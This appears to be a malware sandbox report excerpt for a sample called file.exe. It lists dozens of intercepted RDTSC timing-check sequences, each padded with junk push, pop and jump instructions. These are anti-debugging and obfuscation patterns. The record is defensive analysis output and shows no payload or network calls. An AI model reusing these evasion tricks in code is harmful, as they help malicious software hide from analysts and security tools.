               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C44932 second address: C44941 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007F65E53D9516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C42BEC second address: C42C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F65E53D48C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F65E53D48B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C42C11 second address: C42C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C42F26 second address: C42F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C42F30 second address: C42F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D9524h 0x00000009 jmp 00007F65E53D951Ch 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C42F57 second address: C42F5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C42F5D second address: C42F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D9523h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C430FA second address: C430FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C43828 second address: C43832 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65E53D9516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C43985 second address: C4398F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65E53D48B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C483FC second address: C48421 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F65E53D9516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F65E53D9521h 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F65E53D9516h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48421 second address: C4844C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007F65E53D48C9h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F65E53D48B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4844C second address: C48450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B977F0 second address: B97807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F65E53D48BFh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97807 second address: B9782E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65E53D9516h 0x00000008 js 00007F65E53D9516h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F65E53D9523h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9782E second address: B97834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4E0FE second address: C4E119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9524h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4E119 second address: C4E140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48BAh 0x00000009 popad 0x0000000a push eax 0x0000000b jnp 00007F65E53D48BEh 0x00000011 push eax 0x00000012 pop eax 0x00000013 jnl 00007F65E53D48B6h 0x00000019 pushad 0x0000001a jl 00007F65E53D48B6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5B848 second address: C5B84C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D39C second address: C5D3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48BDh 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5FA85 second address: C5FA8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63CE6 second address: C63D15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C7h 0x00000007 jng 00007F65E53D48BEh 0x0000000d jng 00007F65E53D48B6h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63D15 second address: C63D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63D1B second address: C63D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63D1F second address: C63D2B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65E53D9516h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6FBDF second address: C6FBE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6FBE4 second address: C6FBFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F65E53D951Eh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76303 second address: C76309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76309 second address: C7631A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jo 00007F65E53D9518h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76186 second address: C7618C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7618C second address: C76192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76192 second address: C76196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79170 second address: C7917A instructions: 0x00000000 rdtsc 0x00000002 je 00007F65E53D9516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D46D second address: C7D477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F65E53D48B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D477 second address: C7D47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D47B second address: C7D487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F65E53D48B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D487 second address: C7D4DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F65E53D952Ch 0x00000011 jmp 00007F65E53D9524h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F65E53D9529h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C846A6 second address: C846AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82F22 second address: C82F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82F26 second address: C82F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82F2F second address: C82F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82F37 second address: C82F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48BAh 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F65E53D48C7h 0x00000011 jmp 00007F65E53D48BAh 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C830CC second address: C830ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C833C5 second address: C833E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jmp 00007F65E53D48C1h 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e jo 00007F65E53D48BEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83824 second address: C8383F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9526h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C839A3 second address: C839C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C6h 0x00000007 jg 00007F65E53D48B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C895E8 second address: C8960B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push edx 0x00000008 js 00007F65E53D9516h 0x0000000e pop edx 0x0000000f pushad 0x00000010 jmp 00007F65E53D9521h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA7103 second address: CA7114 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jg 00007F65E53D48B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA7114 second address: CA7119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA7119 second address: CA7143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007F65E53D48B6h 0x0000000b jmp 00007F65E53D48BCh 0x00000010 jmp 00007F65E53D48BAh 0x00000015 popad 0x00000016 ja 00007F65E53D48C2h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA7143 second address: CA7167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F65E53D9516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F65E53D9526h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA7167 second address: CA7178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65E53D48BDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6CFD second address: CA6D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6E40 second address: CA6E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6E46 second address: CA6E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6E4F second address: CA6E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBFE44 second address: CBFE6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9526h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F65E53D951Ch 0x0000000f ja 00007F65E53D9516h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC00EE second address: CC00FA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65E53D48B6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC06A9 second address: CC06CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F65E53D9516h 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F65E53D9518h 0x00000014 pushad 0x00000015 popad 0x00000016 jne 00007F65E53D951Eh 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0818 second address: CC0855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48C6h 0x00000009 pop esi 0x0000000a pushad 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f jnl 00007F65E53D48C3h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 jnc 00007F65E53D48B6h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0855 second address: CC085B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC085B second address: CC0869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F65E53D48B6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0869 second address: CC086D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC09E9 second address: CC09FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F65E53D48BCh 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3A6A second address: CC3A94 instructions: 0x00000000 rdtsc 0x00000002 je 00007F65E53D9516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dl, 36h 0x00000010 push dword ptr [ebp+122D1DA6h] 0x00000016 mov dword ptr [ebp+122D29C2h], eax 0x0000001c push B661DC23h 0x00000021 jnp 00007F65E53D9529h 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4CCB second address: CC4CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC67E8 second address: CC67EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC67EC second address: CC680E instructions: 0x00000000 rdtsc 0x00000002 je 00007F65E53D48B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F65E53D48C0h 0x00000011 jnc 00007F65E53D48B6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC680E second address: CC681D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC681D second address: CC6823 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6823 second address: CC6829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6414 second address: CC6418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6418 second address: CC641C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8218 second address: CC821E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180353 second address: 5180357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180357 second address: 518035D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518035D second address: 5180366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 81DBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B046B second address: 51B048B instructions: 0x00000000 rdtsc 0x00000002 mov dh, 57h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov di, si 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F65E53D48C1h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B048B second address: 51B04B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F65E53D951Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B04B7 second address: 51B04BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B04BD second address: 51B0522 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, 2BBBAD67h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e jmp 00007F65E53D951Ah 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F65E53D951Ch 0x0000001d xor si, BEC8h 0x00000022 jmp 00007F65E53D951Bh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F65E53D9528h 0x0000002e sub si, 4128h 0x00000033 jmp 00007F65E53D951Bh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B0522 second address: 51B0568 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65E53D48BFh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e jmp 00007F65E53D48C4h 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F65E53D48C7h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B0568 second address: 51B05D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F65E53D951Fh 0x00000009 jmp 00007F65E53D9523h 0x0000000e popfd 0x0000000f mov di, ax 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 jmp 00007F65E53D9525h 0x0000001b xchg eax, esi 0x0000001c jmp 00007F65E53D951Eh 0x00000021 lea eax, dword ptr [ebp-04h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F65E53D9527h 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B05D6 second address: 51B05DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B05DC second address: 51B05E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B05E0 second address: 51B05F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop edi 0x0000000d push ecx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov al, 72h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B05F4 second address: 51B0628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov ecx, edx 0x0000000d pushfd 0x0000000e jmp 00007F65E53D951Dh 0x00000013 add ecx, 2FC3B186h 0x00000019 jmp 00007F65E53D9521h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B0628 second address: 51B0671 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F65E53D48C7h 0x00000008 pop esi 0x00000009 jmp 00007F65E53D48C9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F65E53D48BDh 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B0671 second address: 51B0676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B0693 second address: 51B0699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B0699 second address: 51B069D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B069D second address: 51B06AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B06AF second address: 51B06B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B06B3 second address: 51B06B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
